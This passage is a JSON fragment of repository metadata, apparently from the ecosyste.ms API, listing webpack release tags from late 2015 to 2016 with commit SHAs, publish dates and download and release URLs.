yste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.24","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.24/manifests"},{"name":"v2.1.0-beta.23","sha":"8292d2f6597925d6d37fd78b91f0b5cd3798a362","kind":"tag","published_at":"2016-09-19T23:02:08.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.23","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.23","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.23","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.23","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.23/manifests"},{"name":"v2.1.0-beta.22","sha":"f5d9a0901cb6b0cca8dcdbb5cd5a2d21de03fde1","kind":"tag","published_at":"2016-09-07T10:43:10.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.22","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.22","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.22","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.22","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.22/manifests"},{"name":"v1.13.2","sha":"4b20545b375da82aa6418e6d498f01d543110af0","kind":"tag","published_at":"2016-08-18T08:31:36.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.13.2","html_url":"https://github.com/webpack/webpack/releases/tag/v1.13.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.13.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.13.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.13.2/manifests"},{"name":"v2.1.0-beta.21","sha":"c7cb6cb9d0d55b9f9185a8e9db02dcf97ac1c0de","kind":"tag","published_at":"2016-08-17T21:23:43.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.21","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.21","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.21","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.21","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.21/manifests"},{"name":"v2.1.0-beta.20","sha":"b3a3ef3d4545fd1ae5e6abd678de96d4ebfcc5de","kind":"tag","published_at":"2016-07-20T22:41:14.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.20","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.20","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.20","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.20","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.20/manifests"},{"name":"v2.1.0-beta.19","sha":"21a72529fa6af47185dc14f86b8d8de6dbcb6565","kind":"tag","published_at":"2016-07-17T22:49:23.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.19","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.19","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.19","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.19","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.19/manifests"},{"name":"v2.1.0-beta.18","sha":"d826f99e342f7c0ae223a6837d98d2f648780a09","kind":"tag","published_at":"2016-07-15T21:26:36.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.18","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.18","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.18","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.18","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.18/manifests"},{"name":"v2.1.0-beta.17","sha":"bc29455e92f4b760db745775a4fca5cde0d01d23","kind":"tag","published_at":"2016-07-13T12:04:51.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.17","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.17","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.17","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.17","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.17/manifests"},{"name":"v2.1.0-beta.16","sha":"90d537ef4ce1092f76bd02ee2a75838c67b809fc","kind":"tag","published_at":"2016-07-13T09:11:53.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.16","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.16","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.16","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.16","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.16/manifests"},{"name":"v2.1.0-beta.15","sha":"2829516da95a3bb2fe7dde76013f80f0f7e22dbb","kind":"tag","published_at":"2016-06-28T23:23:25.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.15","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.15","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.15","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.15","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.15/manifests"},{"name":"v2.1.0-beta.14","sha":"6748dca837b6402f056b6ac94ffc3c99f8a25c36","kind":"tag","published_at":"2016-06-24T00:02:09.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.14","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.14","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.14","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.14","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.14/manifests"},{"name":"v2.1.0-beta.13","sha":"36e4fd2348381d578c43abcbd15ef39a78b5bc07","kind":"tag","published_at":"2016-06-07T22:25:43.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.13","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.13","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.13","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.13","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.13/manifests"},{"name":"v2.1.0-beta.12","sha":"3580ec93f8ac7b999fc2faa4bccad31fe6ae5331","kind":"tag","published_at":"2016-06-05T21:02:25.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.12","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.12","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.12","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.12/manifests"},{"name":"v2.1.0-beta.11","sha":"0b1f08022681be796612542c7d0d3c736564a4ff","kind":"tag","published_at":"2016-06-05T18:52:04.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.11","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.11/manifests"},{"name":"v2.1.0-beta.10","sha":"2343af44bb4314bafc1ba29cd019bc4b28edbcbf","kind":"tag","published_at":"2016-06-05T18:19:59.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.10","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.10/manifests"},{"name":"v2.1.0-beta.9","sha":"dc3bd055027d8d1ebbb0ebdd07fb73387a0ab6d1","kind":"tag","published_at":"2016-06-04T18:19:59.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.9","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.9/manifests"},{"name":"v2.1.0-beta.8","sha":"abf0cefd592700a19856c3ef9b6d65f905ec73c1","kind":"tag","published_at":"2016-05-29T18:53:06.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.8","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.8/manifests"},{"name":"v1.13.1","sha":"01ea02a95cf8c446fd1dc9e82fae0febe9332034","kind":"tag","published_at":"2016-05-20T06:48:36.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.13.1","html_url":"https://github.com/webpack/webpack/releases/tag/v1.13.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.13.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.13.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.13.1/manifests"},{"name":"v2.1.0-beta.7","sha":"9162f9e6eea62137139f95b8aaedee335c870edd","kind":"tag","published_at":"2016-05-06T22:00:24.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.7","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.7/manifests"},{"name":"v2.1.0-beta.6","sha":"ca8b693c2c17bd06778476381fae23b3b21c0475","kind":"tag","published_at":"2016-04-21T23:03:58.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.6","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.6/manifests"},{"name":"v1.13.0","sha":"006d59500de0493c4096d5d4cecd64eb12db2b95","kind":"tag","published_at":"2016-04-15T13:18:09.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.13.0","html_url":"https://github.com/webpack/webpack/releases/tag/v1.13.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.13.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.13.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.13.0/manifests"},{"name":"v1.12.15","sha":"ee1b8c43b474b22a20bfc25daf0ee153dfb2ef9f","kind":"tag","published_at":"2016-04-10T22:47:40.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.12.15","html_url":"https://github.com/webpack/webpack/releases/tag/v1.12.15","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.12.15","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.15","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.15/manifests"},{"name":"v2.1.0-beta.5","sha":"54405b59b1dd9724e145d4d16726a926042d0e1d","kind":"tag","published_at":"2016-04-10T22:45:17.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.5","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.5/manifests"},{"name":"v2.1.0-beta.4","sha":"c5cc1d25a2a4c0fabdec49a86b3bc62a5d637729","kind":"tag","published_at":"2016-02-24T22:58:31.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.4","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.4/manifests"},{"name":"v2.1.0-beta.3","sha":"13f8b690f0eb9e6058c10631e01e54fb88cd7143","kind":"tag","published_at":"2016-02-22T22:06:40.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.3","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.3/manifests"},{"name":"v1.12.14","sha":"3ed27836b488401a7e9be2de1491a868a8b6f123","kind":"tag","published_at":"2016-02-22T22:04:46.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.12.14","html_url":"https://github.com/webpack/webpack/releases/tag/v1.12.14","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.12.14","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.14","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.14/manifests"},{"name":"v2.1.0-beta.2","sha":"69d0d2e4cfe9545d530c4e1bcb59ea01969a9908","kind":"tag","published_at":"2016-02-22T14:31:44.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.2","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.2/manifests"},{"name":"v2.1.0-beta.1","sha":"fd1e68f5826743b72590e8a97bcfb3d7f78745dd","kind":"tag","published_at":"2016-02-22T12:29:41.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.1","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.1/manifests"},{"name":"v2.1.0-beta.0","sha":"52822286a347bf525eeab7f035341fc25e857914","kind":"tag","published_at":"2016-02-22T08:44:52.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.0","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.0/manifests"},{"name":"v1.12.13","sha":"668a5f0bc68cad70c5182ebcab8b3b1a340e038d","kind":"tag","published_at":"2016-02-04T14:41:41.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.12.13","html_url":"https://github.com/webpack/webpack/releases/tag/v1.12.13","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.12.13","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.13","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.13/manifests"},{"name":"v2.0.7-beta","sha":"432bf35df499e09585c0efeedb3ddbed337d3ed9","kind":"tag","published_at":"2016-02-04T13:46:47.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.0.7-beta","html_url":"https://github.com/webpack/webpack/releases/tag/v2.0.7-beta","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.0.7-beta","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.0.7-beta","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.0.7-beta/manifests"},{"name":"v2.0.6-beta","sha":"71f0945a81e83cc87026d62424f504d00dc6aec3","kind":"tag","published_at":"2016-01-30T12:24:07.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.0.6-beta","html_url":"https://github.com/webpack/webpack/releases/tag/v2.0.6-beta","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.0.6-beta","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.0.6-beta","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.0.6-beta/manifests"},{"name":"v2.0.5-beta","sha":"ac45c3c1a4c9b51eceecba79c6ae1a60887368de","kind":"tag","published_at":"2016-01-26T17:20:24.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.0.5-beta","html_url":"https://github.com/webpack/webpack/releases/tag/v2.0.5-beta","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.0.5-beta","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.0.5-beta","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.0.5-beta/manifests"},{"name":"v1.12.12","sha":"c0420f1ca8e2a444a5b5192a58d88d8d7d710bb7","kind":"tag","published_at":"2016-01-23T12:49:56.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.12.12","html_url":"https://github.com/webpack/webpack/releases/tag/v1.12.12","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.12.12","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.12/manifests"},{"name":"v2.0.4-beta","sha":"bba8afdeef79a7c6e1be6688107fdff3109463bc","kind":"tag","published_at":"2016-01-21T18:19:35.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.0.4-beta","html_url":"https://github.com/webpack/webpack/releases/tag/v2.0.4-beta","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.0.4-beta","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.0.4-beta","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.0.4-beta/manifests"},{"name":"v2.0.3-beta","sha":"b7754b645e50608165e0a28ca4735cd0efcfa0d9","kind":"tag","published_at":"2016-01-21T18:16:52.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.0.3-beta","html_url":"https://github.com/webpack/webpack/releases/tag/v2.0.3-beta","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.0.3-beta","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.0.3-beta","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.0.3-beta/manifests"},{"name":"v1.12.11","sha":"ab433884f140d694241c54e9c6f9de7f049aec6d","kind":"tag","published_at":"2016-01-11T18:14:23.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.12.11","html_url":"https://github.com/webpack/webpack/releases/tag/v1.12.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.12.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.11/manifests"},{"name":"v1.12.10","sha":"66142f2f89868b8e380c4883513cb974680e20e2","kind":"tag","published_at":"2016-01-06T19:29:43.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.12.10","html_url":"https://github.com/webpack/webpack/releases/tag/v1.12.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.12.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.10/manifests"},{"name":"v2.0.2-beta","sha":"0915889feb8558a07b053010e56748566e108285","kind":"tag","published_at":"2015-12-22T11:53:39.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.0.2-beta","html_url":"https://github.com/webpack/webpack/releases/tag/v2.0.2-beta","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.0.2-beta","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.0.2-beta","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.0.2-beta/manifests"},{"name":"v2.0.1-beta","sha":"11932d75a4c8034e5d8afb50985159d33fdb8ddc","kind":"tag","published_at":"2015-11-24T07:28:42.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.0.1-beta","html_url":"https://github.com/webpack/webpack/releases/tag/v2.0.1-beta","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.0.1-beta","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.0.1-beta","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.0.1-beta/manifests"},{"name":"v1.12.9","sha":"9766f2bde3c3f3e7b3b0e914c9cb81ea3a12e823","kind":"tag","published_at":"2015-11-24T07:09:52.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.12.9","html_url":"https://github.com/webpack/webpack/releases/tag/v1.12.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.12.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.9/manifests"},{"name":"v1.12.8","sha":"b59528164913d1234e9dccc55bdfbba2e75767d2","kind":"tag","published_at":"2015-11-20T20:32:28.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.12.8","html_url":"https://github.com/webpack/webpack/releases/tag/v1.12.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.12.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.8/manifests"},{"name":"v1.12.7","sha":"a6c4414a7f38d8098f128bc50e8c83ed4a9de607","kind":"tag","published_at":"2015-11-20T19:32:44.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.12.7","html_url":"https://github.com/webpack/webpack/releases/tag/v1.12.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.12.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.7/manifests"},{"name":"v1.12.6","sha":"7c3e68e8df03cdcef7a6102f61ed4b8cc91cda78","kind":"tag","published_at":"2015-11-14T08:29:52.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.12.6","html_url":"https://github.com/webpack/webpack/releases/tag/v1.12.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.12.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.6/manifests"},{"name":"v1.12.5","sha":"3266bbcd16f8a80c35fcd518bf2fb2fe8997692c","kind":"tag","published_at":"2015-11-13T21:25:36.000Z","download_url":"https://c